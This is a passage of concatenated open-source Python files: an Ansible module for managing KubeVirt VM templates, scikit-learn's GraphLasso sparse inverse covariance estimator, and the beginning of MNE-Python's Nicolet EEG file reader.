- Use Openshift Python SDK to manage the state of KubeVirt templates.
version_added: "2.8"
author: KubeVirt Team (@kubevirt)
options:
name:
description:
- Name of the Template object.
required: true
type: str
namespace:
description:
- Namespace where the Template object exists.
required: true
type: str
objects:
description:
            - List of any valid API objects, such as an I(DeploymentConfig), I(Service), etc. The object
will be created exactly as defined here, with any parameter values substituted in prior to creation.
The definition of these objects can reference parameters defined earlier.
            - As part of the list, the user can also pass the I(VirtualMachine) kind. When passing I(VirtualMachine),
              the user must use the Ansible structure of the parameters, not the Kubernetes API structure. For more information,
              please take a look at the M(kubevirt_vm) module and at the EXAMPLES section, where you can see an example.
type: list
merge_type:
description:
- Whether to override the default patch merge approach with a specific type. By default, the strategic
merge will typically be used.
type: list
choices: [ json, merge, strategic-merge ]
display_name:
description:
- "A brief, user-friendly name, which can be employed by user interfaces."
type: str
description:
description:
- A description of the template.
            - Include enough detail that the user will understand what is being deployed
              and any caveats they need to know before deploying. It should also provide links to additional information,
              such as a README file.
type: str
long_description:
description:
- "Additional template description. This may be displayed by the service catalog, for example."
type: str
provider_display_name:
description:
- "The name of the person or organization providing the template."
type: str
documentation_url:
description:
- "A URL referencing further documentation for the template."
type: str
support_url:
description:
- "A URL where support can be obtained for the template."
type: str
editable:
description:
- "Extension for hinting at which elements should be considered editable.
List of jsonpath selectors. The jsonpath root is the objects: element of the template."
            - This parameter can be used only when the kubevirt addon is installed on your openshift cluster.
type: list
default_disk:
description:
- "The goal of default disk is to define what kind of disk is supported by the OS mainly in
terms of bus (ide, scsi, sata, virtio, ...)"
            - The C(default_disk) parameter defines a configuration overlay for disks that will be applied on top of disks
during virtual machine creation to define global compatibility and/or performance defaults defined here.
            - This parameter can be used only when the kubevirt addon is installed on your openshift cluster.
type: dict
default_volume:
description:
- "The goal of default volume is to be able to configure mostly performance parameters like
caches if those are exposed by the underlying volume implementation."
            - The C(default_volume) parameter defines a configuration overlay for volumes that will be applied on top of volumes
during virtual machine creation to define global compatibility and/or performance defaults defined here.
            - This parameter can be used only when the kubevirt addon is installed on your openshift cluster.
type: dict
default_nic:
description:
- "The goal of default network is similar to I(default_disk) and should be used as a template
to ensure OS compatibility and performance."
            - The C(default_nic) parameter defines a configuration overlay for nics that will be applied on top of nics
during virtual machine creation to define global compatibility and/or performance defaults defined here.
            - This parameter can be used only when the kubevirt addon is installed on your openshift cluster.
type: dict
default_network:
description:
- "The goal of default network is similar to I(default_volume) and should be used as a template
that specifies performance and connection parameters (L2 bridge for example)"
            - The C(default_network) parameter defines a configuration overlay for networks that will be applied on top of networks
during virtual machine creation to define global compatibility and/or performance defaults defined here.
            - This parameter can be used only when the kubevirt addon is installed on your openshift cluster.
type: dict
icon_class:
description:
- "An icon to be displayed with your template in the web console. Choose from our existing logo
icons when possible. You can also use icons from FontAwesome. Alternatively, provide icons through
CSS customizations that can be added to an OpenShift Container Platform cluster that uses your template.
You must specify an icon class that exists, or it will prevent falling back to the generic icon."
type: str
parameters:
description:
- "Parameters allow a value to be supplied by the user or generated when the template is instantiated.
Then, that value is substituted wherever the parameter is referenced. References can be defined in any
field in the objects list field. This is useful for generating random passwords or allowing the user to
supply a host name or other user-specific value that is required to customize the template."
- "More information can be foud at: U(https://docs.openshift.com/container-platform/3.6/dev_guide/templates.html#writing-parameters)"
type: list
version:
description:
- Template structure version.
            - This parameter can be used only when the kubevirt addon is installed on your openshift cluster.
type: str
extends_documentation_fragment:
- k8s_auth_options
- k8s_state_options
requirements:
- python >= 2.7
- openshift >= 0.8.2
'''
EXAMPLES = '''
- name: Create template 'mytemplate'
kubevirt_template:
state: present
name: myvmtemplate
namespace: templates
display_name: Generic cirros template
description: Basic cirros template
long_description: Verbose description of cirros template
provider_display_name: Just Be Cool, Inc.
documentation_url: http://theverycoolcompany.com
support_url: http://support.theverycoolcompany.com
icon_class: icon-linux
default_disk:
disk:
bus: virtio
default_nic:
model: virtio
default_network:
resource:
resourceName: bridge.network.kubevirt.io/cnvmgmt
default_volume:
containerDisk:
image: kubevirt/cirros-container-disk-demo:latest
objects:
- name: ${NAME}
kind: VirtualMachine
memory: ${MEMORY_SIZE}
state: present
namespace: vms
parameters:
- name: NAME
description: VM name
generate: expression
from: 'vm-[A-Za-z0-9]{8}'
- name: MEMORY_SIZE
description: Memory size
value: 1Gi
- name: Remove template 'myvmtemplate'
kubevirt_template:
state: absent
name: myvmtemplate
namespace: templates
'''
RETURN = '''
kubevirt_template:
description:
- The template dictionary specification returned by the API.
returned: success
type: complex
contains: {}
'''
import copy
import traceback
from ansible.module_utils.k8s.common import AUTH_ARG_SPEC
from ansible.module_utils.kubevirt import (
virtdict,
KubeVirtRawModule,
API_GROUP,
MAX_SUPPORTED_API_VERSION
)
TEMPLATE_ARG_SPEC = {
'name': {'required': True},
'namespace': {'required': True},
'state': {
'default': 'present',
'choices': ['present', 'absent'],
},
'force': {
'type': 'bool',
'default': False,
},
'merge_type': {
'type': 'list',
'choices': ['json', 'merge', 'strategic-merge']
},
'objects': {
'type': 'list',
},
'display_name': {
'type': 'str',
},
'description': {
'type': 'str',
},
'long_description': {
'type': 'str',
},
'provider_display_name': {
'type': 'str',
},
'documentation_url': {
'type': 'str',
},
'support_url': {
'type': 'str',
},
'icon_class': {
'type': 'str',
},
'version': {
'type': 'str',
},
'editable': {
'type': 'list',
},
'default_disk': {
'type': 'dict',
},
'default_volume': {
'type': 'dict',
},
'default_network': {
'type': 'dict',
},
'default_nic': {
'type': 'dict',
},
'parameters': {
'type': 'list',
},
}
class KubeVirtVMTemplate(KubeVirtRawModule):
@property
def argspec(self):
""" argspec property builder """
argument_spec = copy.deepcopy(AUTH_ARG_SPEC)
argument_spec.update(TEMPLATE_ARG_SPEC)
return argument_spec
def execute_module(self):
# Parse parameters specific for this module:
definition = virtdict()
# Execute the CRUD of VM template:
kind = 'Template'
template_api_version = 'template.openshift.io/v1'
# Fill in template parameters:
definition['parameters'] = self.params.get('parameters')
# Fill in the default Label
labels = definition['metadata']['labels']
labels['template.cnv.io/type'] = 'vm'
# Fill in Openshift/Kubevirt template annotations:
annotations = definition['metadata']['annotations']
if self.params.get('display_name'):
annotations['openshift.io/display-name'] = self.params.get('display_name')
if self.params.get('description'):
annotations['description'] = self.params.get('description')
if self.params.get('long_description'):
annotations['openshift.io/long-description'] = self.params.get('long_description')
if self.params.get('provider_display_name'):
annotations['openshift.io/provider-display-name'] = self.params.get('provider_display_name')
if self.params.get('documentation_url'):
annotations['openshift.io/documentation-url'] = self.params.get('documentation_url')
if self.params.get('support_url'):
annotations['openshift.io/support-url'] = self.params.get('support_url')
if self.params.get('icon_class'):
annotations['iconClass'] = self.params.get('icon_class')
if self.params.get('version'):
annotations['template.cnv.io/version'] = self.params.get('version')
        # TODO: Make it more Ansiblish, so users don't have to specify the API JSON path, but rather Ansible params:
if self.params.get('editable'):
annotations['template.cnv.io/editable'] = self.params.get('editable')
# Set defaults annotations:
if self.params.get('default_disk'):
annotations['defaults.template.cnv.io/disk'] = self.params.get('default_disk').get('name')
if self.params.get('default_volume'):
annotations['defaults.template.cnv.io/volume'] = self.params.get('default_volume').get('name')
if self.params.get('default_nic'):
annotations['defaults.template.cnv.io/nic'] = self.params.get('default_nic').get('name')
if self.params.get('default_network'):
annotations['defaults.template.cnv.io/network'] = self.params.get('default_network').get('name')
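        # For illustration (hypothetical values): default_disk={'name': 'default',
        # 'disk': {'bus': 'virtio'}} yields the annotation
        # defaults.template.cnv.io/disk=default; only the 'name' key is read here.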
        # Process objects:
self.client = self.get_api_client()
definition['objects'] = []
objects = self.params.get('objects') or []
for obj in objects:
if obj['kind'] != 'VirtualMachine':
definition['objects'].append(obj)
else:
vm_definition = virtdict()
# Set VM defaults:
if self.params.get('default_disk'):
vm_definition['spec']['template']['spec']['domain']['devices']['disks'] = [self.params.get('default_disk')]
if self.params.get('default_volume'):
vm_definition['spec']['template']['spec']['volumes'] = [self.params.get('default_volume')]
if self.params.get('default_nic'):
vm_definition['spec']['template']['spec']['domain']['devices']['interfaces'] = [self.params.get('default_nic')]
if self.params.get('default_network'):
vm_definition['spec']['template']['spec']['networks'] = [self.params.get('default_network')]
# Set kubevirt API version:
vm_definition['apiVersion'] = '%s/%s' % (API_GROUP, MAX_SUPPORTED_API_VERSION)
                # Construct k8s vm API object:
vm_template = vm_definition['spec']['template']
dummy, vm_def = self.construct_vm_template_definition('VirtualMachine', vm_definition, vm_template, obj)
definition['objects'].append(vm_def)
# Create template:
resource = self.client.resources.get(api_version=template_api_version, kind=kind, name='templates')
definition = self.set_defaults(resource, definition)
result = self.perform_action(resource, definition)
# Return from the module:
self.exit_json(**{
'changed': result['changed'],
'kubevirt_template': result.pop('result'),
'result': result,
})
def main():
module = KubeVirtVMTemplate()
try:
module.execute_module()
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
| gpl-3.0 |
YinongLong/scikit-learn | sklearn/covariance/graph_lasso_.py | 51 | 26432 | """GraphLasso: sparse inverse covariance estimation with an l1-penalized
estimator.
"""
# Author: Gael Varoquaux <[email protected]>
# License: BSD 3 clause
# Copyright: INRIA
import warnings
import operator
import sys
import time
import numpy as np
from scipy import linalg
from .empirical_covariance_ import (empirical_covariance, EmpiricalCovariance,
log_likelihood)
from ..exceptions import ConvergenceWarning
from ..utils.extmath import pinvh
from ..utils.validation import check_random_state, check_array
from ..linear_model import lars_path
from ..linear_model import cd_fast
from ..model_selection import check_cv, cross_val_score
from ..externals.joblib import Parallel, delayed
import collections
# Helper functions to compute the objective and dual objective functions
# of the l1-penalized estimator
def _objective(mle, precision_, alpha):
"""Evaluation of the graph-lasso objective function
    The objective function is made of a shifted, scaled version of the
    normalized log-likelihood (i.e. its empirical mean over the samples) and a
    penalisation term to promote sparsity.
"""
p = precision_.shape[0]
cost = - 2. * log_likelihood(mle, precision_) + p * np.log(2 * np.pi)
cost += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return cost
def _dual_gap(emp_cov, precision_, alpha):
"""Expression of the dual gap convergence criterion
The specific definition is given in Duchi "Projected Subgradient Methods
for Learning Sparse Gaussians".
"""
gap = np.sum(emp_cov * precision_)
gap -= precision_.shape[0]
gap += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return gap
def alpha_max(emp_cov):
"""Find the maximum alpha for which there are some non-zeros off-diagonal.
Parameters
----------
emp_cov : 2D array, (n_features, n_features)
The sample covariance matrix
Notes
-----
    This results from the bound for all the Lasso problems that are solved
in GraphLasso: each time, the row of cov corresponds to Xy. As the
bound for alpha is given by `max(abs(Xy))`, the result follows.
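
    For example, for ``emp_cov = [[2., .3], [.3, 1.]]`` the largest
    off-diagonal magnitude, and hence the returned value, is 0.3.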
"""
A = np.copy(emp_cov)
A.flat[::A.shape[0] + 1] = 0
return np.max(np.abs(A))
# The g-lasso algorithm
def graph_lasso(emp_cov, alpha, cov_init=None, mode='cd', tol=1e-4,
enet_tol=1e-4, max_iter=100, verbose=False,
return_costs=False, eps=np.finfo(np.float64).eps,
return_n_iter=False):
"""l1-penalized covariance estimator
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
emp_cov : 2D ndarray, shape (n_features, n_features)
Empirical covariance from which to compute the covariance estimate.
alpha : positive float
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
cov_init : 2D array (n_features, n_features), optional
The initial guess for the covariance.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : boolean, optional
If verbose is True, the objective function and dual gap are
printed at each iteration.
return_costs : boolean, optional
If return_costs is True, the objective function and dual gap
at each iteration are returned.
eps : float, optional
The machine-precision regularization in the computation of the
Cholesky diagonal factors. Increase this for very ill-conditioned
systems.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
covariance : 2D ndarray, shape (n_features, n_features)
The estimated covariance matrix.
precision : 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrix.
costs : list of (objective, dual_gap) pairs
The list of values of the objective function and the dual gap at
each iteration. Returned only if return_costs is True.
n_iter : int
Number of iterations. Returned only if `return_n_iter` is set to True.
See Also
--------
GraphLasso, GraphLassoCV
Notes
-----
The algorithm employed to solve this problem is the GLasso algorithm,
from the Friedman 2008 Biostatistics paper. It is the same algorithm
as in the R `glasso` package.
One possible difference with the `glasso` R package is that the
diagonal coefficients are not penalized.
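
    Examples
    --------
    A minimal illustrative sketch on a toy 2-feature covariance (values
    are arbitrary):

    >>> import numpy as np
    >>> emp_cov = np.array([[1., .4], [.4, 1.]])
    >>> cov, prec = graph_lasso(emp_cov, alpha=0.2)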
"""
_, n_features = emp_cov.shape
if alpha == 0:
if return_costs:
precision_ = linalg.inv(emp_cov)
cost = - 2. * log_likelihood(emp_cov, precision_)
cost += n_features * np.log(2 * np.pi)
d_gap = np.sum(emp_cov * precision_) - n_features
if return_n_iter:
return emp_cov, precision_, (cost, d_gap), 0
else:
return emp_cov, precision_, (cost, d_gap)
else:
if return_n_iter:
return emp_cov, linalg.inv(emp_cov), 0
else:
return emp_cov, linalg.inv(emp_cov)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init.copy()
# As a trivial regularization (Tikhonov like), we scale down the
# off-diagonal coefficients of our starting point: This is needed, as
# in the cross-validation the cov_init can easily be
    # ill-conditioned, and the CV loop blows up. Besides, this takes a
    # conservative standpoint on the initial conditions, and it tends to
# make the convergence go faster.
covariance_ *= 0.95
diagonal = emp_cov.flat[::n_features + 1]
covariance_.flat[::n_features + 1] = diagonal
precision_ = pinvh(covariance_)
indices = np.arange(n_features)
costs = list()
    # The different l1 regression solvers have different numerical errors
if mode == 'cd':
errors = dict(over='raise', invalid='ignore')
else:
errors = dict(invalid='raise')
try:
# be robust to the max_iter=0 edge case, see:
# https://github.com/scikit-learn/scikit-learn/issues/4134
d_gap = np.inf
for i in range(max_iter):
for idx in range(n_features):
sub_covariance = np.ascontiguousarray(
covariance_[indices != idx].T[indices != idx])
row = emp_cov[idx, indices != idx]
with np.errstate(**errors):
if mode == 'cd':
# Use coordinate descent
coefs = -(precision_[indices != idx, idx]
/ (precision_[idx, idx] + 1000 * eps))
coefs, _, _, _ = cd_fast.enet_coordinate_descent_gram(
coefs, alpha, 0, sub_covariance, row, row,
max_iter, enet_tol, check_random_state(None), False)
else:
# Use LARS
_, _, coefs = lars_path(
sub_covariance, row, Xy=row, Gram=sub_covariance,
alpha_min=alpha / (n_features - 1), copy_Gram=True,
method='lars', return_path=False)
# Update the precision matrix
precision_[idx, idx] = (
1. / (covariance_[idx, idx]
- np.dot(covariance_[indices != idx, idx], coefs)))
precision_[indices != idx, idx] = (- precision_[idx, idx]
* coefs)
precision_[idx, indices != idx] = (- precision_[idx, idx]
* coefs)
coefs = np.dot(sub_covariance, coefs)
covariance_[idx, indices != idx] = coefs
covariance_[indices != idx, idx] = coefs
d_gap = _dual_gap(emp_cov, precision_, alpha)
cost = _objective(emp_cov, precision_, alpha)
if verbose:
print(
'[graph_lasso] Iteration % 3i, cost % 3.2e, dual gap %.3e'
% (i, cost, d_gap))
if return_costs:
costs.append((cost, d_gap))
if np.abs(d_gap) < tol:
break
if not np.isfinite(cost) and i > 0:
raise FloatingPointError('Non SPD result: the system is '
'too ill-conditioned for this solver')
else:
warnings.warn('graph_lasso: did not converge after %i iteration:'
' dual gap: %.3e' % (max_iter, d_gap),
ConvergenceWarning)
except FloatingPointError as e:
e.args = (e.args[0]
+ '. The system is too ill-conditioned for this solver',)
raise e
if return_costs:
if return_n_iter:
return covariance_, precision_, costs, i + 1
else:
return covariance_, precision_, costs
else:
if return_n_iter:
return covariance_, precision_, i + 1
else:
return covariance_, precision_
class GraphLasso(EmpiricalCovariance):
"""Sparse inverse covariance estimation with an l1-penalized estimator.
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
alpha : positive float, default 0.01
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
mode : {'cd', 'lars'}, default 'cd'
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, default 1e-4
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, default 100
The maximum number of iterations.
verbose : boolean, default False
If verbose is True, the objective function and dual gap are
plotted at each iteration.
assume_centered : boolean, default False
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : array-like, shape (n_features, n_features)
Estimated covariance matrix
precision_ : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
n_iter_ : int
Number of iterations run.
See Also
--------
graph_lasso, GraphLassoCV
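
    Examples
    --------
    A minimal sketch on synthetic data (exact estimates are
    sample-dependent):

    >>> import numpy as np
    >>> from sklearn.covariance import GraphLasso
    >>> X = np.random.RandomState(0).randn(60, 4)
    >>> model = GraphLasso(alpha=0.05).fit(X)
    >>> model.precision_.shape
    (4, 4)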
"""
def __init__(self, alpha=.01, mode='cd', tol=1e-4, enet_tol=1e-4,
max_iter=100, verbose=False, assume_centered=False):
self.alpha = alpha
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
# Covariance does not make sense for a single feature
X = check_array(X, ensure_min_features=2, ensure_min_samples=2,
estimator=self)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=self.alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=self.verbose, return_n_iter=True)
return self
# Cross-validation with GraphLasso
def graph_lasso_path(X, alphas, cov_init=None, X_test=None, mode='cd',
tol=1e-4, enet_tol=1e-4, max_iter=100, verbose=False):
"""l1-penalized covariance estimator along a path of decreasing alphas
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
X : 2D ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate.
alphas : list of positive floats
The list of regularization parameters, decreasing order.
X_test : 2D array, shape (n_test_samples, n_features), optional
Optional test matrix to measure generalisation error.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : integer, optional
The higher the verbosity flag, the more information is printed
during the fitting.
Returns
-------
covariances_ : List of 2D ndarray, shape (n_features, n_features)
The estimated covariance matrices.
precisions_ : List of 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrices.
scores_ : List of float
The generalisation error (log-likelihood) on the test data.
Returned only if test data is passed.
"""
inner_verbose = max(0, verbose - 1)
emp_cov = empirical_covariance(X)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init
covariances_ = list()
precisions_ = list()
scores_ = list()
if X_test is not None:
test_emp_cov = empirical_covariance(X_test)
for alpha in alphas:
try:
# Capture the errors, and move on
covariance_, precision_ = graph_lasso(
emp_cov, alpha=alpha, cov_init=covariance_, mode=mode, tol=tol,
enet_tol=enet_tol, max_iter=max_iter, verbose=inner_verbose)
covariances_.append(covariance_)
precisions_.append(precision_)
if X_test is not None:
this_score = log_likelihood(test_emp_cov, precision_)
except FloatingPointError:
this_score = -np.inf
covariances_.append(np.nan)
precisions_.append(np.nan)
if X_test is not None:
if not np.isfinite(this_score):
this_score = -np.inf
scores_.append(this_score)
if verbose == 1:
sys.stderr.write('.')
elif verbose > 1:
if X_test is not None:
print('[graph_lasso_path] alpha: %.2e, score: %.2e'
% (alpha, this_score))
else:
print('[graph_lasso_path] alpha: %.2e' % alpha)
if X_test is not None:
return covariances_, precisions_, scores_
return covariances_, precisions_
class GraphLassoCV(GraphLasso):
"""Sparse inverse covariance w/ cross-validated choice of the l1 penalty
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
    alphas : integer, or list of positive floats, optional
If an integer is given, it fixes the number of points on the
grids of alpha to be used. If a list is given, it gives the
grid to be used. See the notes in the class docstring for
more details.
    n_refinements : strictly positive integer
The number of times the grid is refined. Not used if explicit
values of alphas are passed.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs :class:`KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
    tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
    max_iter : integer, optional
Maximum number of iterations.
    mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where number of features is greater
than number of samples. Elsewhere prefer cd which is more numerically
stable.
    n_jobs : int, optional
number of jobs to run in parallel (default 1).
    verbose : boolean, optional
If verbose is True, the objective function and duality gap are
printed at each iteration.
assume_centered : Boolean
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : numpy.ndarray, shape (n_features, n_features)
Estimated covariance matrix.
precision_ : numpy.ndarray, shape (n_features, n_features)
Estimated precision matrix (inverse covariance).
alpha_ : float
Penalization parameter selected.
cv_alphas_ : list of float
All penalization parameters explored.
    grid_scores : 2D numpy.ndarray (n_alphas, n_folds)
Log-likelihood score on left-out data across folds.
n_iter_ : int
Number of iterations run for the optimal alpha.
See Also
--------
graph_lasso, GraphLasso
Notes
-----
The search for the optimal penalization parameter (alpha) is done on an
iteratively refined grid: first the cross-validated scores on a grid are
computed, then a new refined grid is centered around the maximum, and so
on.
One of the challenges which is faced here is that the solvers can
fail to converge to a well-conditioned estimate. The corresponding
values of alpha then come out as missing values, but the optimum may
be close to these missing values.
"""
def __init__(self, alphas=4, n_refinements=4, cv=None, tol=1e-4,
enet_tol=1e-4, max_iter=100, mode='cd', n_jobs=1,
verbose=False, assume_centered=False):
self.alphas = alphas
self.n_refinements = n_refinements
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.cv = cv
self.n_jobs = n_jobs
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
"""Fits the GraphLasso covariance model to X.
Parameters
----------
X : ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate
"""
# Covariance does not make sense for a single feature
X = check_array(X, ensure_min_features=2, estimator=self)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
cv = check_cv(self.cv, y, classifier=False)
# List of (alpha, scores, covs)
path = list()
n_alphas = self.alphas
inner_verbose = max(0, self.verbose - 1)
if isinstance(n_alphas, collections.Sequence):
alphas = self.alphas
n_refinements = 1
else:
n_refinements = self.n_refinements
alpha_1 = alpha_max(emp_cov)
alpha_0 = 1e-2 * alpha_1
alphas = np.logspace(np.log10(alpha_0), np.log10(alpha_1),
n_alphas)[::-1]
t0 = time.time()
for i in range(n_refinements):
with warnings.catch_warnings():
# No need to see the convergence warnings on this grid:
# they will always be points that will not converge
# during the cross-validation
warnings.simplefilter('ignore', ConvergenceWarning)
# Compute the cross-validated loss on the current grid
# NOTE: Warm-restarting graph_lasso_path has been tried, and
# this did not allow to gain anything (same execution time with
# or without).
this_path = Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(delayed(graph_lasso_path)(X[train], alphas=alphas,
X_test=X[test], mode=self.mode,
tol=self.tol,
enet_tol=self.enet_tol,
max_iter=int(.1 * self.max_iter),
verbose=inner_verbose)
for train, test in cv.split(X, y))
            # Little dance to transform the list into what we need
covs, _, scores = zip(*this_path)
covs = zip(*covs)
scores = zip(*scores)
path.extend(zip(alphas, scores, covs))
path = sorted(path, key=operator.itemgetter(0), reverse=True)
            # Find the maximum (avoid using built-in 'max' function to
# have a fully-reproducible selection of the smallest alpha
# in case of equality)
best_score = -np.inf
last_finite_idx = 0
for index, (alpha, scores, _) in enumerate(path):
this_score = np.mean(scores)
if this_score >= .1 / np.finfo(np.float64).eps:
this_score = np.nan
if np.isfinite(this_score):
last_finite_idx = index
if this_score >= best_score:
best_score = this_score
best_index = index
# Refine the grid
if best_index == 0:
# We do not need to go back: we have chosen
# the highest value of alpha for which there are
# non-zero coefficients
alpha_1 = path[0][0]
alpha_0 = path[1][0]
elif (best_index == last_finite_idx
and not best_index == len(path) - 1):
# We have non-converged models on the upper bound of the
# grid, we need to refine the grid there
alpha_1 = path[best_index][0]
alpha_0 = path[best_index + 1][0]
elif best_index == len(path) - 1:
alpha_1 = path[best_index][0]
alpha_0 = 0.01 * path[best_index][0]
else:
alpha_1 = path[best_index - 1][0]
alpha_0 = path[best_index + 1][0]
if not isinstance(n_alphas, collections.Sequence):
alphas = np.logspace(np.log10(alpha_1), np.log10(alpha_0),
n_alphas + 2)
alphas = alphas[1:-1]
if self.verbose and n_refinements > 1:
print('[GraphLassoCV] Done refinement % 2i out of %i: % 3is'
% (i + 1, n_refinements, time.time() - t0))
path = list(zip(*path))
grid_scores = list(path[1])
alphas = list(path[0])
# Finally, compute the score with alpha = 0
alphas.append(0)
grid_scores.append(cross_val_score(EmpiricalCovariance(), X,
cv=cv, n_jobs=self.n_jobs,
verbose=inner_verbose))
self.grid_scores = np.array(grid_scores)
best_alpha = alphas[best_index]
self.alpha_ = best_alpha
self.cv_alphas_ = alphas
# Finally fit the model with the selected alpha
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=best_alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=inner_verbose, return_n_iter=True)
return self
| bsd-3-clause |
teonlamont/mne-python | mne/io/nicolet/nicolet.py | 2 | 7703 | # Author: Jaakko Leppakangas <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
from os import path
import datetime
import calendar
from ...utils import logger
from ..utils import _read_segments_file, _find_channels, _create_chs
from ..base import BaseRaw, _check_update_montage
from ..meas_info import _empty_info
from ..constants import FIFF
def read_raw_nicolet(input_fname, ch_type, montage=None, eog=(), ecg=(),
emg=(), misc=(), preload=False, verbose=None):
"""Read Nicolet data as raw object.
Note: This reader takes data files with the extension ``.data`` as an
input. The header file with the same file name stem and an extension
``.head`` is expected to be found in the same directory.
Parameters
----------
input_fname : str
Path to the data file.
ch_type : str
Channel type to designate to the data channels. Supported data types
include 'eeg', 'seeg'.
montage : str | None | instance of montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
eog : list | tuple | 'auto'
Names of channels or list of indices that should be designated
EOG channels. If 'auto', the channel names beginning with
``EOG`` are used. Defaults to empty tuple.
ecg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
ECG channels. If 'auto', the channel names beginning with
``ECG`` are used. Defaults to empty tuple.
emg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
EMG channels. If 'auto', the channel names beginning with
``EMG`` are used. Defaults to empty tuple.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Defaults to empty tuple.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
raw : Instance of Raw
A Raw object containing the data.
See Also
--------
    mne.io.Raw : Documentation of attributes and methods.
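
    Examples
    --------
    A minimal sketch (file names are hypothetical; the matching ``.head``
    header must sit next to the ``.data`` file):

    >>> raw = read_raw_nicolet('rec.data', ch_type='eeg')  # doctest: +SKIP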
"""
return RawNicolet(input_fname, ch_type, montage=montage, eog=eog, ecg=ecg,
emg=emg, misc=misc, preload=preload, verbose=verbose)
def _get_nicolet_info(fname, ch_type, eog, ecg, emg, misc):
"""Extract info from Nicolet header files."""
fname = path.splitext(fname)[0]
header = fname + '.head'
logger.info('Reading header...')
header_info = dict()
with open(header, 'r') as fid:
for line in fid:
var, value = line.split('=')
if var == 'elec_names':
value = value[1:-2].split(',') # strip brackets
elif var == 'conversion_factor':
value = float(value)
elif var != 'start_ts':
value = int(value)
header_info[var] = value
ch_names = header_info['elec_names']
if eog == 'auto':
eog = _find_channels(ch_names, 'EOG')
if ecg == 'auto':
